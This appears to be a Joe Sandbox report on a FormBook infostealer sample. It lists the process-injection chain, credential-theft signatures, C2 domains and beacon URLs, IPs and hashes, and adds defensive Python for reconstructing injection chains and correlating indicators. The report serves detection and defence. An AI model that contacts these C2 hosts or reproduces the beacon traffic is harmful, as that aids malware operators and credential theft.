Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol
Impact: 1 System Shutdown/Reboot
Behavior Graph

Behavior Graph ID: 1529036 | Sample: enkJ6J7dAn.exe | Startdate: 08/10/2024 | Architecture: WINDOWS | Score: 100
Bracketed numbers are the per-process count badges from the graph.

Start node
  DNS/IP: www.uburn.xyz; www.nakama2-sshl.xyz; 22 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures
  www.nakama2-sshl.xyz: Performs DNS queries to domains with low reputation

enkJ6J7dAn.exe [1] (started)
  Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  -> starts svchost.exe
     Signatures: Maps a DLL or memory area into another process
     -> injects into avmjQSNkeFbUoa.exe
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        -> starts RmClient.exe [13]
           Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
           -> injects into avmjQSNkeFbUoa.exe
              DNS/IP: www.uburn.xyz 67.223.117.189, ports 49980, 49981, 49982 (VIMRO-AS15189US, United States); www.nakama2-sshl.xyz 183.181.83.131, ports 49988, 49989, 49990 (VECTANTARTERIANetworksCorporationJP, Japan); 9 other IPs or domains
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           -> starts firefox.exe
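The chain in the behavior graph (sample starts svchost.exe, svchost.exe injects into another process, the injected process starts RmClient.exe, which injects again and starts firefox.exe) is the kind of parent/child plus injection pattern a detection engineer wants to reconstruct from endpoint telemetry rather than read off a sandbox picture. The Python below is an added example written for this page; it is not Joe Sandbox code and not FormBook code. EVENTS is constructed to mirror the graph's edges (graph node ids stand in for PIDs); the "exec"/"inject" record shape and every function name are this example's own assumptions. In a real deployment the same two edge kinds would come from Sysmon Event ID 1 (process create) and Event IDs 8/10 (CreateRemoteThread / ProcessAccess).

```python
"""Reconstruct the process-injection chain shown in the behavior graph.

Added example, not part of the Joe Sandbox report. EVENTS is constructed from
the graph's edges; the record layout and function names are this example's own.
"""
from collections import defaultdict

# Constructed events. Node numbers from the graph stand in for PIDs.
# "exec": src started dst.  "inject": src wrote to / mapped memory into dst.
EVENTS = [
    {"kind": "exec",   "src": None, "dst": 10, "image": "enkJ6J7dAn.exe"},      # sample started by the analysis
    {"kind": "exec",   "src": 10,   "dst": 13, "image": "svchost.exe"},         # sample spawns svchost.exe
    {"kind": "inject", "src": 13,   "dst": 16, "image": "avmjQSNkeFbUoa.exe"},  # svchost.exe maps memory into it
    {"kind": "exec",   "src": 16,   "dst": 19, "image": "RmClient.exe"},        # injected process starts RmClient.exe
    {"kind": "inject", "src": 19,   "dst": 22, "image": "avmjQSNkeFbUoa.exe"},  # RmClient.exe injects again
    {"kind": "exec",   "src": 19,   "dst": 26, "image": "firefox.exe"},         # and starts a browser
]


def build_graph(events):
    """Return (image_by_pid, children) where children maps pid -> [(kind, child_pid)]."""
    image = {}
    children = defaultdict(list)
    for e in events:
        image[e["dst"]] = e["image"]
        if e["src"] is not None:
            children[e["src"]].append((e["kind"], e["dst"]))
    return image, children


def injection_paths(events):
    """Every root-to-leaf path that crosses at least one inject edge, as a readable list."""
    image, children = build_graph(events)
    out = []

    def walk(pid, path, injected):
        kids = children.get(pid, [])
        if not kids:
            if injected:
                out.append(path)
            return
        for kind, child in kids:
            arrow = "=inject=>" if kind == "inject" else "-start->"
            walk(child, path + [arrow, image[child]], injected or kind == "inject")

    for e in events:
        if e["src"] is None:
            walk(e["dst"], [image[e["dst"]]], False)
    return out


def suspicious_svchost(events):
    """svchost.exe instances whose parent is not services.exe.

    services.exe is the normal parent of svchost.exe; a few Windows components
    (e.g. update and Defender processes) also start it, so triage rather than
    auto-block. Returns [(pid, parent_image)].
    """
    image, _ = build_graph(events)
    hits = []
    for e in events:
        if e["kind"] == "exec" and e["image"].lower() == "svchost.exe":
            parent = image.get(e["src"], "<none>")
            if parent.lower() != "services.exe":
                hits.append((e["dst"], parent))
    return hits


def injected_then_spawns(events):
    """Processes that received an injection and afterwards started a child.

    This is the pivot the graph shows: the injected avmjQSNkeFbUoa.exe is the
    one that launches RmClient.exe. Returns [(pid, image, child_image)].
    """
    image, children = build_graph(events)
    hits = []
    for e in events:
        if e["kind"] != "inject":
            continue
        for kind, child in children.get(e["dst"], []):
            if kind == "exec":
                hits.append((e["dst"], image[e["dst"]], image[child]))
    return hits


if __name__ == "__main__":
    for p in injection_paths(EVENTS):
        print(" ".join(p))
    print("svchost.exe with unexpected parent:", suspicious_svchost(EVENTS))
    print("injected process that spawned a child:", injected_then_spawns(EVENTS))
```

Run stand-alone it prints both root-to-leaf paths (one ending in the second injected avmjQSNkeFbUoa.exe, one in firefox.exe), flags svchost.exe because its parent is the sample rather than services.exe, and names the injected process that went on to start RmClient.exe. Feeding it real Sysmon records only requires mapping Event ID 1 to "exec" and Event IDs 8/10 to "inject".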

Antivirus Detection

Initial Sample
Source | Detection | Scanner | Label
enkJ6J7dAn.exe | 71% | ReversingLabs | Win32.Backdoor.FormBook
enkJ6J7dAn.exe | 100% | Joe Sandbox ML |

Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.polarmuseum.info | 199.59.243.227 | true | true | | unknown
www.uburn.xyz | 67.223.117.189 | true | true | | unknown
o731lh.vip | 3.33.130.190 | true | true | | unknown
newdaydawning.net | 44.213.25.70 | true | true | | unknown
zz82x.top | 38.47.232.196 | true | true | | unknown
tukaari.shop | 3.33.130.190 | true | true | | unknown
40wxd.top | 206.119.82.134 | true | true | | unknown
komart.shop | 133.130.35.90 | true | true | | unknown
www.nakama2-sshl.xyz | 183.181.83.131 | true | true | | unknown
redirect.3dns.box | 172.191.244.62 | true | true | | unknown
healthyloveforall.net | 3.33.130.190 | true | true | | unknown
www.prj81oqde1.buzz | 154.212.219.2 | true | true | | unknown
mommymode.site | 162.241.244.106 | true | true | | unknown
www.tukaari.shop | unknown | unknown | true | | unknown
www.zz82x.top | unknown | unknown | true | | unknown
www.40wxd.top | unknown | unknown | true | | unknown
www.o731lh.vip | unknown | unknown | true | | unknown
www.newdaydawning.net | unknown | unknown | true | | unknown
www.lurknlarkk.xyz | unknown | unknown | true | | unknown
www.healthyloveforall.net | unknown | unknown | true | | unknown
www.mommymode.site | unknown | unknown | true | | unknown
www.komart.shop | unknown | unknown | true | | unknown
www.i16zb920d.cfd | unknown | unknown | true | | unknown
URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.newdaydawning.net/7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc6qM4fhKpxjqsp0T9dbSaLHAdgBuOtHQwGARxDApDg0JQqA== | true | | unknown
http://www.zz82x.top/ak5l/ | true | | unknown
http://www.lurknlarkk.xyz/jqkr/?nV=j99yFPFWu1ukFCAkcsa1pdNTyzikS1cIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu8NEu/AkJhGyL6Y/IOsxIi9hhzm6Wfo2GHcU4TuRzIqeNlQ==&ntHx=DVDDWR70P4Ux | true | | unknown
http://www.nakama2-sshl.xyz/ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA8/Tr/xM1b+8LUYxrC0lZhY3XVqHkHg9ScVh1/tZdAIFMag==&ntHx=DVDDWR70P4Ux | true | | unknown
http://www.prj81oqde1.buzz/6wpo/?nV=s9KIkrkzrqTbzkMlvbBfjAUuuxKvGdewBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAeSSUnznUnGrbhm47OZW7gX2VGBRmOyGjZmEPzG32fut7kA==&ntHx=DVDDWR70P4Ux | true | | unknown
http://www.nakama2-sshl.xyz/ui3j/ | true | | unknown
http://www.healthyloveforall.net/u6k6/ | true | | unknown
http://www.polarmuseum.info/nuqv/?nV=cqR4daz/40w4b6rdKNYqvkeleB2fEiPhnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvyy/SGYyigH7HtG4hHq89KwpktbUpTg5pzo/PCicdM9eRug==&ntHx=DVDDWR70P4Ux | true | | unknown
http://www.tukaari.shop/b8ih/ | true | | unknown
http://www.prj81oqde1.buzz/6wpo/ | true | | unknown
http://www.polarmuseum.info/nuqv/ | true | | unknown
http://www.komart.shop/p9u3/ | true | | unknown
http://www.healthyloveforall.net/u6k6/?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux | true | | unknown
http://www.mommymode.site/hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzXF+iMRPEX9kIPKmzrc+t3cVFLxWq6eg+2bNJjDDlhrBGZQ== | true | | unknown
http://www.o731lh.vip/eruc/ | true | | unknown
http://www.40wxd.top/l8if/ | true | | unknown
http://www.o731lh.vip/eruc/?ntHx=DVDDWR70P4Ux&nV=0pHn1M2gwaL5mql+tyiDCW8+wEBXBUyoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJSHRFZ9VRSgAmugrmpHJKo8BhJN8eoKLjgrj/d04fMg3yYg== | true | | unknown
http://www.mommymode.site/hya5/ | true | | unknown
http://www.komart.shop/p9u3/?nV=D1Jc/C1nh+BZL85aQihK2StkCXQN9YWXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1EyuYNuFTcIXqGngDeSQ6xB8eOEHekfFMT1fbVeuWDNHI3uA==&ntHx=DVDDWR70P4Ux | true | | unknown
http://www.lurknlarkk.xyz/jqkr/ | true | | unknown
http://www.uburn.xyz/iqqs/ | true | | unknown
http://www.zz82x.top/ak5l/?ntHx=DVDDWR70P4Ux&nV=eH+SO6exUc8kNdksa1CSzQBVVc7aplBFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhL3O0xstuwQMp3nW6pA5kKg3bBdr252Da+1tCwmPlqiVqcw== | true | | unknown
http://www.tukaari.shop/b8ih/?nV=Odz4+FoaeIgH5S8BzuYjRriywjm3wUfEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD81Bj6MrqplT1UHUL5zd01ssdakVPMNWHRSFmdvBITbtw3Bg==&ntHx=DVDDWR70P4Ux | true | | unknown
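Pulling indicators out of the domain and URL tables above is more useful when the list is correlated instead of copied: every URL that carries a beacon uses a different per-domain path token and a different nV blob, but the same ntHx value across all of the contacted domains, and three of the domains resolve to the same address (3.33.130.190). The Python below is an added example written for this page, not Joe Sandbox output and not FormBook code. The URLs and domain-to-IP pairs are copied from the tables above; the function names and the grouping logic are this example's own, and treating the constant ntHx value as a campaign-wide pivot is this example's assumption, not something the report states.

```python
"""Correlate the C2 indicators tabulated in this report.

Added example, not part of the Joe Sandbox report. URLs and domain/IP pairs are
copied from the report's tables; function names and grouping logic are this
example's own.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Malicious URLs from the report (the duplicate path-only rows are dropped).
C2_URLS = [
    "http://www.newdaydawning.net/7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc6qM4fhKpxjqsp0T9dbSaLHAdgBuOtHQwGARxDApDg0JQqA==",
    "http://www.lurknlarkk.xyz/jqkr/?nV=j99yFPFWu1ukFCAkcsa1pdNTyzikS1cIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu8NEu/AkJhGyL6Y/IOsxIi9hhzm6Wfo2GHcU4TuRzIqeNlQ==&ntHx=DVDDWR70P4Ux",
    "http://www.nakama2-sshl.xyz/ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA8/Tr/xM1b+8LUYxrC0lZhY3XVqHkHg9ScVh1/tZdAIFMag==&ntHx=DVDDWR70P4Ux",
    "http://www.prj81oqde1.buzz/6wpo/?nV=s9KIkrkzrqTbzkMlvbBfjAUuuxKvGdewBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAeSSUnznUnGrbhm47OZW7gX2VGBRmOyGjZmEPzG32fut7kA==&ntHx=DVDDWR70P4Ux",
    "http://www.polarmuseum.info/nuqv/?nV=cqR4daz/40w4b6rdKNYqvkeleB2fEiPhnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvyy/SGYyigH7HtG4hHq89KwpktbUpTg5pzo/PCicdM9eRug==&ntHx=DVDDWR70P4Ux",
    "http://www.healthyloveforall.net/u6k6/?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux",
    "http://www.mommymode.site/hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzXF+iMRPEX9kIPKmzrc+t3cVFLxWq6eg+2bNJjDDlhrBGZQ==",
    "http://www.o731lh.vip/eruc/?ntHx=DVDDWR70P4Ux&nV=0pHn1M2gwaL5mql+tyiDCW8+wEBXBUyoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJSHRFZ9VRSgAmugrmpHJKo8BhJN8eoKLjgrj/d04fMg3yYg==",
    "http://www.komart.shop/p9u3/?nV=D1Jc/C1nh+BZL85aQihK2StkCXQN9YWXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1EyuYNuFTcIXqGngDeSQ6xB8eOEHekfFMT1fbVeuWDNHI3uA==&ntHx=DVDDWR70P4Ux",
    "http://www.zz82x.top/ak5l/?ntHx=DVDDWR70P4Ux&nV=eH+SO6exUc8kNdksa1CSzQBVVc7aplBFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhL3O0xstuwQMp3nW6pA5kKg3bBdr252Da+1tCwmPlqiVqcw==",
    "http://www.tukaari.shop/b8ih/?nV=Odz4+FoaeIgH5S8BzuYjRriywjm3wUfEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD81Bj6MrqplT1UHUL5zd01ssdakVPMNWHRSFmdvBITbtw3Bg==&ntHx=DVDDWR70P4Ux",
    "http://www.uburn.xyz/iqqs/",
    "http://www.40wxd.top/l8if/",
]

# Domain -> resolved IP from the report's domain table (rows with no IP omitted).
DOMAIN_IPS = {
    "www.polarmuseum.info": "199.59.243.227",
    "www.uburn.xyz": "67.223.117.189",
    "o731lh.vip": "3.33.130.190",
    "newdaydawning.net": "44.213.25.70",
    "zz82x.top": "38.47.232.196",
    "tukaari.shop": "3.33.130.190",
    "40wxd.top": "206.119.82.134",
    "komart.shop": "133.130.35.90",
    "www.nakama2-sshl.xyz": "183.181.83.131",
    "redirect.3dns.box": "172.191.244.62",
    "healthyloveforall.net": "3.33.130.190",
    "www.prj81oqde1.buzz": "154.212.219.2",
    "mommymode.site": "162.241.244.106",
}


def parse_c2_url(url):
    """Split one URL into host (without a leading www.), path token and query parameters."""
    parts = urlsplit(url)
    host = parts.hostname.lower()
    if host.startswith("www."):
        host = host[4:]
    params = parse_qs(parts.query, keep_blank_values=True)
    return {"host": host, "path": parts.path.strip("/"),
            "params": {k: v[0] for k, v in params.items()}}


def correlate_c2(urls):
    """Group the URL list into pivots: hosts, per-host path tokens, and query
    parameters whose value never changes across hosts (campaign constants)."""
    parsed = [parse_c2_url(u) for u in urls]
    path_by_host = {p["host"]: p["path"] for p in parsed}
    values = defaultdict(set)
    for p in parsed:
        for k, v in p["params"].items():
            values[k].add(v)
    constants = {k: next(iter(v)) for k, v in values.items() if len(v) == 1}
    return {
        "hosts": sorted(path_by_host),
        "path_by_host": path_by_host,
        "constant_params": constants,
        "beaconing_hosts": sorted(p["host"] for p in parsed if "nV" in p["params"]),
    }


def shared_ip_clusters(domain_ips):
    """IPs that more than one contacted domain resolves to, with the domains."""
    by_ip = defaultdict(list)
    for domain, ip in domain_ips.items():
        by_ip[ip].append(domain)
    return {ip: sorted(d) for ip, d in by_ip.items() if len(d) > 1}


if __name__ == "__main__":
    summary = correlate_c2(C2_URLS)
    print("hosts:", len(summary["hosts"]), "beaconing:", len(summary["beaconing_hosts"]))
    print("constant query parameters:", summary["constant_params"])
    print("shared IPs:", shared_ip_clusters(DOMAIN_IPS))
```

The constant-parameter check is the part worth keeping: a value that is identical across every contacted domain survives domain rotation, so a proxy or IDS rule keyed on it (here the ntHx query value) outlives any single-domain blocklist built from this report. The shared-IP cluster is the second pivot; blocking 3.33.130.190 covers three of the listed domains at once, at the cost of whatever else that address hosts.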
URLs found in memory

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.polarmuseum.info | avmjQSNkeFbUoa.exe, 00000006.00000002.4591962813.000000000575F000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://newdaydawning.net/7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk | RmClient.exe, 00000005.00000002.4591201110.0000000003804000.00000004.10000000.00040000.00000000.sdmp; avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.00000000036B4000.00000004.00000001.00040000.00000000.sdmp; firefox.exe, 00000008.00000002.2664524956.0000000000AC4000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | RmClient.exe, 00000005.00000002.4591201110.0000000004C6E000.00000004.10000000.00040000.00000000.sdmp; RmClient.exe, 00000005.00000002.4593050924.0000000005E00000.00000004.00000800.00020000.00000000.sdmp; avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.0000000004B1E000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mommymode.site/hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoR | RmClient.exe, 00000005.00000002.4591201110.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp; avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.000000000498C000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://nakama2-sshl.xyz/ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd | RmClient.exe, 00000005.00000002.4591201110.0000000003FDE000.00000004.10000000.00040000.00000000.sdmp; avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.0000000003E8E000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
172.191.244.62 | redirect.3dns.box | United States | 7018 | ATT-INTERNET4US | true
67.223.117.189 | www.uburn.xyz | United States | 15189 | VIMRO-AS15189US | true
154.212.219.2 | www.prj81oqde1.buzz | Seychelles | 133201 | COMING-ASABCDEGROUPCOMPANYLIMITEDHK | true
44.213.25.70 | newdaydawning.net | United States | 14618 | AMAZON-AESUS | true
133.130.35.90 | komart.shop | Japan | 7506 | INTERQGMOInternetIncJP | true
38.47.232.196 | zz82x.top | United States | 174 | COGENT-174US | true
199.59.243.227 | www.polarmuseum.info | United States | 395082 | BODIS-NJUS | true
183.181.83.131 | www.nakama2-sshl.xyz | Japan | 2519 | VECTANTARTERIANetworksCorporationJP | true
206.119.82.134 | 40wxd.top | United States | 174 | COGENT-174US | true
3.33.130.190 | o731lh.vip | United States | 8987 | AMAZONEXPANSIONGB | true
162.241.244.106 | mommymode.site | United States | 46606 | UNIFIEDLAYER-AS-1US | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529036
Start date and time: 2024-10-08 15:36:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: enkJ6J7dAn.exe (renamed because the original name is a hash value)
Original Sample Name: 6cf789bf69a166e597d5befad3751a5153799bbcc4b1337b4c8f3af996b0650f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@17/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
                                                                                                                  • Number of executed functions: 52
                                                                                                                  • Number of non-executed functions: 305
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Execution Graph export aborted for target avmjQSNkeFbUoa.exe, PID 4984 because it is empty
                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  • VT rate limit hit for: enkJ6J7dAn.exe
Time | Type | Description
09:38:12 | API Interceptor | 11281223x Sleep call for process: RmClient.exe modified
Process: C:\Windows\SysWOW64\RmClient.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\enkJ6J7dAn.exe
File Type: data
Category: dropped
Size (bytes): 287232
Entropy (8bit): 7.995597066137699
Encrypted: true
SSDEEP: 6144:WsoTSqTPR3ieM6kMTCT6WLSRAg7vmWcbvr5eVyJHw:Ws4PcvMTKxG2g7vUbvr5eVyW
MD5: 46328C2E5345A69E7FDF7D5653D1EDF7
SHA1: 894EE4CD4D8463A007850067993AE7C27740A8DC
SHA-256: 6F5989317B11B2E652B241874301B6F1F02C97C67DD4C0B3CD570D758BF71A39
SHA-512: 3219BDECF819F7CE2DB1AC9472A9C983E5A41709A6EAF3EDFFDF42958C4424F69F5DAA0D20AE518E6D1CEE802A685AF693EFF3DC840B18F4952E05C910DF96A7
Malicious: false
Reputation: low
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.5614605854643315
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:enkJ6J7dAn.exe
                                                                                                                  File size:1'402'195 bytes
                                                                                                                  MD5:dc1b0b674722f76e68cdfcd373c34ab9
                                                                                                                  SHA1:c6862db7bccf03b7e3a66f98cc05b4bf624cc9fa
                                                                                                                  SHA256:6cf789bf69a166e597d5befad3751a5153799bbcc4b1337b4c8f3af996b0650f
                                                                                                                  SHA512:a71733ff69e8f720a7aa176fb639b74942e5e556a5761cc914771a7ab0ec0d66f062afbaf1cb25719f2bbe52c8669931c99da0e7ffda293f4054f341a1317b9a
                                                                                                                  SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCGRamDgJ21ry4pEPYb3IcJbY7MAab6f7ro:7JZoQrbTFZY1iaCKaN2VBSYb5O7MAvo
                                                                                                                  TLSH:5055F221B5D68036C2B327B19E7EF7A9963D793A0336D29727C82E311E505416B3A733
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                                  Icon Hash:1733312925935517
                                                                                                                  Entrypoint:0x4165c1
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE (no DYNAMIC_BASE or NX_COMPAT flag: the image does not opt in to ASLR or DEP, consistent with RELOCS_STRIPPED and the empty base-relocation directory below)
                                                                                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
Instruction (disassembly from the entrypoint 0x4165c1; from the nop that follows the last indirect jmp dword ptr [004166D4h+ecx*4] onward, the decoder is consuming the 0x004166xx address entries of those jump tables as if they were code, so the inc cx / add byte ptr lines are table data, not instructions)
                                                                                                                  call 00007F4B8CC55ACBh
                                                                                                                  jmp 00007F4B8CC4C93Eh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
